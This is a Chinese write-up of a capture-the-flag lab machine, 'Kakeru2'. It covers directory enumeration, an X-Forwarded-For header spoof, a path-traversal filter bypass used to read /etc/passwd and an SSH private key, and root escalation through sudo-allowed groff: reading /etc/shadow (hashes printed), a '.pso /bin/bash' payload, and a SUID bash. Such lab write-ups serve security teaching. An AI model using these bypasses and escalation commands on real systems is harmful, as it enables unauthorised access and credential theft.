群友靶机-Kakeru2 wp

web

非常常规的机器，我就开放了80和22
curl一下在首页有guayu留下的信息

<!--
你们的“安全系统”？不堪一击。 ;)
为了方便我下次“回来看看”,我留下了点东西
-guayu
-->

说明这个系统被guayu渗透了，并且留了一个后门
扫一下目录如果你用dirsearch直接扫会发现什么都没有
用gobuster 指定字典会发现有一个403的secret.php 但是返回长度和其他的403界面不同

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.114.232/ -x php,txt,jpg,js,zip,bak 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.114.232/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,jpg,js,zip,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/secret.php           (Status: 403) [Size: 206]

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.114.232/secret.php 
<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access this resource.</p> Maybe I only trust requests from localhost? </body></html> 

在这里为了让目标更加明确，留了个提示：从本地访问所以加上X-Forwarded-For标头

──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.114.232/secret.php -H "X-Forwarded-For: 127.0.0.1"

<h1>Guayu 的秘密文件通道</h1>
    <div class="congrats">
        <p><span class="highlight">恭喜你</span>你成功通过了第一道验证，找到了这个由 Guayu 精心留下的后门！</p>
        <p>请小心使用，并非所有门都为你敞开...</p>
    </div>

    <p>当前识别的访问源: <span class="highlight">127.0.0.1</span> (已授权)</p>

    <div class="container">
        <h2>内部文件探测器 v2.0 </h2>
        
        <p>输入文件的相对路径 (相对于此脚本位置) 或某些特定服务的已知路径。请注意，此工具内置了一些基本的<span class="highlight">路径安全检查</span>。</p>

        <form method="GET" action="/secret.php">
            <label for="filename">目标文件:</label>
            <input type="text" id="filename" name="filename" placeholder="例如: welcome.txt 或 config/settings.ini" autocomplete="off" value="">
            <input type="submit" value="[ 探测文件 ]">
        </form>

            </div>

    <p style="margin-top: 40px; font-size: 0.85em; color: #666; text-align: center;">
        -- 通道维护者: Guayu 
    </p>

这是一个有过滤的读取文件的页面，你可以在输入框中输入文件，也可以在url里面直接带上filename参数
这里先看看当前secret.php的过滤逻辑

┌──(root㉿kakeru)-[~/tmp]
└─# curl "192.168.114.232/secret.php?filename=secret.php" -H "X-Forwarded-For: 127.0.0.1"

 if (
        substr($filename, 0, 1) === &#039;/&#039; ||
        substr($filename, 0, 3) === &#039;../&#039; ||
        strpos($filename, &#039;\\&#039;) !== false ||
        strpos($filename, &#039;//&#039;) !== false ||
	    strpos($filename, &#039;...&#039;) !== false ||
	    strpos($filename, &#039;://&#039;) !== false
    ) {

这里就是不能以/开头，不能用...这种复写绕过，并且禁止使用php伪协议
这里考察的是用./ 这个当前目录和../结合来绕过
所以用./.././.././../etc/passwd测试是否可以读取文件

┌──(root㉿kakeru)-[~/tmp]
└─# curl "192.168.114.232/secret.php?filename=./.././.././../etc/passwd" -H "X-Forwarded-For: 127.0.0.1"

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
guayu:x:1000:1000:,,,:/home/guayu:/bin/bash

发现是可以的，然后有一个guayu用户，读取读取/home/guayu/.ssh/id_rsa 获得该用户的私钥就能登上这个用户

┌──(root㉿kakeru)-[~/tmp]
└─# chmod 600 id_rsa                                                                                                
                                                                                                                                                         
┌──(root㉿kakeru)-[~/tmp]
└─# ls -al id_rsa   
-rw------- 1 root root 3381 Jun  4 10:22 id_rsa
                                                                                                                                                         
┌──(root㉿kakeru)-[~/tmp]
└─# ssh guayu@192.168.114.232 -i id_rsa
Linux Kakeru2 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun  2 11:29:06 2025 from 192.168.114.11
guayu@Kakeru2:~$ ls id
ls: cannot access 'id': No such file or directory
guayu@Kakeru2:~$ id
uid=1000(guayu) gid=1000(guayu) groups=1000(guayu)

提权

sudo -l 发现可以使用groff 指令这个是一个格式化手写文档的工具

guayu@Kakeru2:~$ sudo -l
Matching Defaults entries for guayu on Kakeru2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User guayu may run the following commands on Kakeru2:
    (ALL) NOPASSWD: /usr/bin/groff *

第一种方法可以直接用这个工具来读取文件

guayu@Kakeru2:~$ sudo /usr/bin/groff  -man -Tascii /etc/shadow
troff: /etc/shadow:1: warning [p 1, 0.0i]: cannot adjust line
troff: /etc/shadow:1: warning [p 1, 0.2i]: cannot adjust line
troff: /etc/shadow:26: warning [p 1, 2.5i]: cannot adjust line
troff: /etc/shadow:26: warning [p 1, 2.7i]: cannot adjust line
root:$6$TkJiunDYYH/8ETYb$Rbor5mqOT0O3bOcsMWEzgO2QvN2ttdlkJcM-
GIo5LDi4oxwESo0VsLx3zL0x3eA3L5MTNhyaGl7EUCbDi-
vBgeb/:20242:0:99999:7:::             daemon:*:20166:0:99999:7:::
bin:*:20166:0:99999:7:::                 sys:*:20166:0:99999:7:::
sync:*:20166:0:99999:7:::              games:*:20166:0:99999:7:::
man:*:20166:0:99999:7:::                  lp:*:20166:0:99999:7:::
mail:*:20166:0:99999:7:::               news:*:20166:0:99999:7:::
uucp:*:20166:0:99999:7:::   proxy:*:20166:0:99999:7:::    www-da-
ta:*:20166:0:99999:7:::               backup:*:20166:0:99999:7:::
list:*:20166:0:99999:7:::                irc:*:20166:0:99999:7:::
gnats:*:20166:0:99999:7:::            nobody:*:20166:0:99999:7:::
_apt:*:20166:0:99999:7:::   systemd-timesync:*:20166:0:99999:7:::
systemd-network:*:20166:0:99999:7:::                  systemd-re-
solve:*:20166:0:99999:7:::  systemd-coredump:!!:20166::::::  mes-
sagebus:*:20166:0:99999:7:::            sshd:*:20166:0:99999:7:::
guayu:$6$TX3nztwWtmEYaSQI$xj7ofvrgPmkM4tQ-
CY8hUV1P905H3yvz3F90KYq/tHUDcD8cCAhT92.vNIRz8Iyu9vLHBmXQY-
BXFC.akO2XKb2/:20241:0:99999:7:::

整理一下root的格式然后可以爆破密码(差不多爆破时间4，5分钟)

第二种方式是使用-U执行命令
写一个.roff文件然后用-U执行

echo '.pso /bin/bash' > payload.roff
sudo /usr/bin/groff -U payload.roff

.pso会让groff调用外部程序执行

guayu@Kakeru2:~$ sudo /usr/bin/groff -U payload.roff 
root@Kakeru2:/home/guayu# chmod +s /bin/bash
root@Kakeru2:/home/guayu# exit
exit
guayu@Kakeru2:~$ bash -p
bash-5.0# id
uid=1000(guayu) gid=1000(guayu) euid=0(root) egid=0(root) groups=0(root),1000(guayu)

当然这个工具可以直接读文件，你要是直接读flag也行